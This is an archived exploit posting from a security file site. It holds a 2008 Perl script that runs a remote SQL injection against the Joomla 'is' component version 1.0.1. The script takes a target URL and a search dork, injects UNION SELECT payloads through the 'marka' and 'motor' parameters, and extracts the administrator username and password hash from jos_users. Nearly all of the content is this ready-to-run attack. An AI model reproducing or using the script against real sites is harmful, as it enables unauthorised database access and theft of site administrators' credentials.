joomlais-sql.txt

joomlais-sql.txt: Posted Jul 10, 2008; Authored by H-T Team | Site no-hack.fr; Joomla is component version 1.0.1 multiple remote SQL injection vulnerabilities exploit.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 20998a2bf2ac4d1edd7f6947dedc2dad496801fc6304ef54cb100d7707e2b6a1; Download | Favorite | View

joomlais-sql.txt

#!/usr/bin/perl -w

#   Joomla Component is  v 1.0.1  Multiple Remote SQL Injection
#  variables vuln : ( marka )  & ( motor ) 
########################################
#[*] Found by : Houssamix From H-T Team 
#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
#[*] Greetz : Mr.Al3FrItE & Islamic Security Team  & Mounita20 & CoNaN and all musulmans hackers

#[*] Component_Name:  is
#[*] Script_Name: Joomla
#[*] Dork : index.php?option=com_is
########################################
# <name>is</name>
# <creationDate>09.05.2006</creationDate>
# <author>MAXX MARKETING</author>
# <copyright>by 2006 Maxx Marketing</copyright>
# <authorEmail>klaus.huber@maxx-marketing.net</authorEmail>
# <authorUrl>www.maxx-marketing.net</authorUrl>
# <version>1.0.1</version> 


system("color f");
print "\t\t########################################################\n\n";
print "\t\t#                        Viva Islam                    #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component Is v 1.0.1 multiple SQL Injection   #\n\n";
print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]                #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/joomla/): ";
  chomp(my $target=<STDIN>);

$uname="username";
$magic="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){
       
    print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
    print "\n[+] Admin Hash : $1\n\n";
    print "#   Exploit succeed!  #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}

# codec  by Houssamix From H-T Team

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

joomlais-sql.txt

joomlais-sql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

joomlais-sql.txt

Share This

joomlais-sql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems